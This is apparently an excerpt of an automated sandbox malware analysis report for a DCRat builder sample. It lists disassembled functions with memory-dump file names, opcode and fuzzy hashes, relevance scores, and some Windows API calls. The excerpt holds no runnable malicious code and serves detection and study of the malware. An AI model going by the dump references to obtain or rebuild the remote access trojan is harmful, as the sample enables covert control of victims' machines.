                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                        • Instruction ID: 84d124c96ce23b0cd4c2aed626eca0b6addf1d10991805501dfc6097a9d980c7
                                        • Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
                                        • Instruction Fuzzy Hash: A4523AB26087058FC718CF19C891A6AF7E1FFCC304F498A2DE98597255D734EA19CB86
                                        Function 00746A7B Relevance: .5, Instructions: 509COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d38bceb7875d3f878cde1ef87da084a3469c6a7d136acf51660bb3f78daef93a
                                        • Instruction ID: 66c5ac489132999353388d85dc3f111162c98fa59892d0d00d8ae427d473c5fb
                                        • Opcode Fuzzy Hash: d38bceb7875d3f878cde1ef87da084a3469c6a7d136acf51660bb3f78daef93a
                                        • Instruction Fuzzy Hash: 4F12D1B17047068BC72CCF28C9D46B9B3E1FB55308F14892EE597C7A81E778A895CB46
                                        Function 0073BE13 Relevance: .4, Instructions: 449COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ea4214791b585c4148b34b79d19b050b78bd826baf458f0fac73cc302c56056
                                        • Instruction ID: 1693cb284bd6700ab9571d56246261478605b5888055fdf9638eebff8e0c6c81
                                        • Opcode Fuzzy Hash: 2ea4214791b585c4148b34b79d19b050b78bd826baf458f0fac73cc302c56056
                                        • Instruction Fuzzy Hash: D5F199726083418FE719CF29C88496EBBE1FFC9314F148A2EF5D5A7252D738E9058B42
                                        Function 00750B43 Relevance: .3, Instructions: 345COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction ID: fa6fdd7136474cef660dd974c345ebdd6e145d43ce00539dde68fe890475ee84
                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                        • Instruction Fuzzy Hash: 05C1A8362051930ADF2D463A89741BFBAA16A927B331A0B5DDCB3CB1C4FE58D52CD960
                                        Function 00750F78 Relevance: .3, Instructions: 341COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction ID: 0f022f33c3e6f9a2f09ed681bda2338f0948dac6275ac50184cc058dcc6b2ef5
                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction Fuzzy Hash: 95C1A9362151930ADF2D463AC9741BFBBA16A917B331A076DDCB2CB0C4FE58D52CDA50
                                        Function 0075070E Relevance: .3, Instructions: 331COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: cefe21f49a8ae246007e27c88c2cfea1032a7aff250ad8015327d57883fbf8f7
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: CAC1A7362051530ADF1D463A89344BFBAA16EA17B231A075DDCB3CB1C5FE58E52CD990
                                        Function 00746646 Relevance: .3, Instructions: 325COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: f83414a0a26dc4cf527f5f767942cc1a84be7785f6c62b6f3eef4e8a8f1bfbf0
                                        • Instruction ID: 473c00bd352e6a01328dcb7f3e904df36d2be9d6d9dac6196698b504595ba711
                                        • Opcode Fuzzy Hash: f83414a0a26dc4cf527f5f767942cc1a84be7785f6c62b6f3eef4e8a8f1bfbf0
                                        • Instruction Fuzzy Hash: C4D105B1A043419FDB14CF28C88479BBBE4BF96308F04456DE8849B742D778E959CB9B
                                        Function 007502F6 Relevance: .3, Instructions: 323COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: 02c5b7761a69de0923ec274ddc273ab4f631c9705b9ea0b6699edf5502eb5a3e
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: BDC1B7362051930ADF2D463A89344BFBBA16A927B331A076DDCB3CB1C4FE58D52CD950
                                        Function 0073E2A0 Relevance: .3, Instructions: 318COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 200cf49ca22484ba9fef40d8a0ef92a8d16bb6fb58a64e6c98371764123bca88
                                        • Instruction ID: c7255c188db9eed8f3f7aa8dd06d97ecdfac573ce79068ca9b985c75160fdf44
                                        • Opcode Fuzzy Hash: 200cf49ca22484ba9fef40d8a0ef92a8d16bb6fb58a64e6c98371764123bca88
                                        • Instruction Fuzzy Hash: F8E136745187848FC304CF29D89086ABBF0BB8A340F85495EF5D987352C339EA59DBA2
                                        Function 00743A3C Relevance: .3, Instructions: 263COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                        • Instruction ID: 00f104920e3befcbe57e97562c9041256950b31cf1a24b374df641e8b0439cb0
                                        • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                                        • Instruction Fuzzy Hash: DF9135B02047499BEB24EF68D8D9BBE7795EB90300F10092DE5DB872C2EB7C9645C752
                                        Function 00754969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 83f2a496e681089ad545972d5cdb63c32b824570997f29d00487cd4cdb013b7f
                                        • Instruction ID: 0eb5a53342389f75b5bcbefb4019aadb7b7a9b4a176cbfd78c6a2246317d8d9d
                                        • Opcode Fuzzy Hash: 83f2a496e681089ad545972d5cdb63c32b824570997f29d00487cd4cdb013b7f
                                        • Instruction Fuzzy Hash: 68615771680708A6DE788B28485ABFF3394AB4134FF104619EC82DB281D6DDEDCE8759
                                        Function 00743D6D Relevance: .2, Instructions: 232COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                        • Instruction ID: 81f9cf68eda0d8582d3c8c247c320127074d231ec5a6bc5d1cfa91a40c2baeb1
                                        • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                        • Instruction Fuzzy Hash: AF712F717043459BEB24DE28C8D5BBD77E5AB90304F00492DE5CE8B283DB7CDA898752
                                        Function 0075473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                        • Instruction ID: abac6251dd68c0b4156eb99328ac08166a29b9e552cc4ce03835bcb7db8c5423
                                        • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                        • Instruction Fuzzy Hash: 0C513771600A84A6EB384728885A7FF27C99B5734FF180949ED8297282C7DDFDCD8355
                                        Function 0073DE6C Relevance: .2, Instructions: 190COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30e612b7d53db6d510dbd84906a7af605450b7d48bf504a46e28071faf8700bc
                                        • Instruction ID: 16f61c1320f0ed521cd597880aee7979e6ff02e4da4f396b552876402af8e68b
                                        • Opcode Fuzzy Hash: 30e612b7d53db6d510dbd84906a7af605450b7d48bf504a46e28071faf8700bc
                                        • Instruction Fuzzy Hash: 0F81918221E7D89DD71A4F7C38E42F53FA15733381F1980AAC4C9862A3D17E49E8DB65
                                        Function 0073E8A0 Relevance: .2, Instructions: 154COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79035cd300d17293bdeef89ab0ff51301f054c0f3359705393c794905e69caaa
                                        • Instruction ID: d122370b4781ab7ecc879aad1e87735935bda4fc656d8d6f74ce847240771e1f
                                        • Opcode Fuzzy Hash: 79035cd300d17293bdeef89ab0ff51301f054c0f3359705393c794905e69caaa
                                        • Instruction Fuzzy Hash: 1C51EF319083D58FD712CF24918456EBFE0BE9A314F49499EE4D55B283D338EA49CB93
                                        Function 0073F968 Relevance: .1, Instructions: 131COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08a6191fd88212c77171e2a2d9fc9fb5da61ac5deeb73276ea11f671996d6cac
                                        • Instruction ID: e4dc06390fe337da434fc020def676a463a0b1197c8603d310a70d7e05ca20b4
                                        • Opcode Fuzzy Hash: 08a6191fd88212c77171e2a2d9fc9fb5da61ac5deeb73276ea11f671996d6cac
                                        • Instruction Fuzzy Hash: 52512571A083028FC748CF19D48059AF7E1FF88354F058A2EE899E7741DB34EA59CB96
                                        Function 007437C1 Relevance: .1, Instructions: 112COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                        • Instruction ID: ef2df5c7d6c4855115dfbc669c1cb951be822b76afbf285375c1675acd9b973e
                                        • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                        • Instruction Fuzzy Hash: E431F4B16047469FDB14DF28C89666ABBE0FB95300F10492DE4D9C7342C73DEA49CBA2
                                        Function 00735F3C Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6a7f9a4115f2d99f0d119fbe89380a400c156bd791ea59819e02fd9cc3d488e
                                        • Instruction ID: 07cacf3698855e2648b2182c8ee99dda6b7fb25856278e8b8d9f4140a8a3e573
                                        • Opcode Fuzzy Hash: e6a7f9a4115f2d99f0d119fbe89380a400c156bd791ea59819e02fd9cc3d488e
                                        • Instruction Fuzzy Hash: 5621DA72A202614BCB48CF2DED9083A7751A78A311B46C22BEA46CB2D1C53DE925C7E0
                                        Function 0073DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 0073DABE
                                          • Part of subcall function 0073400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0073401D
                                          • Part of subcall function 00741596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00770EE8,00000200,0073D202,00000000,?,00000050,00770EE8), ref: 007415B3
                                        • _strlen.LIBCMT ref: 0073DADF
                                        • SetDlgItemTextW.USER32(?,0076E154,?), ref: 0073DB3F
                                        • GetWindowRect.USER32(?,?), ref: 0073DB79
                                        • GetClientRect.USER32(?,?), ref: 0073DB85
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0073DC25
                                        • GetWindowRect.USER32(?,?), ref: 0073DC52
                                        • SetWindowTextW.USER32(?,?), ref: 0073DC95
                                        • GetSystemMetrics.USER32(00000008), ref: 0073DC9D
                                        • GetWindow.USER32(?,00000005), ref: 0073DCA8
                                        • GetWindowRect.USER32(00000000,?), ref: 0073DCD5
                                        • GetWindow.USER32(00000000,00000002), ref: 0073DD47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
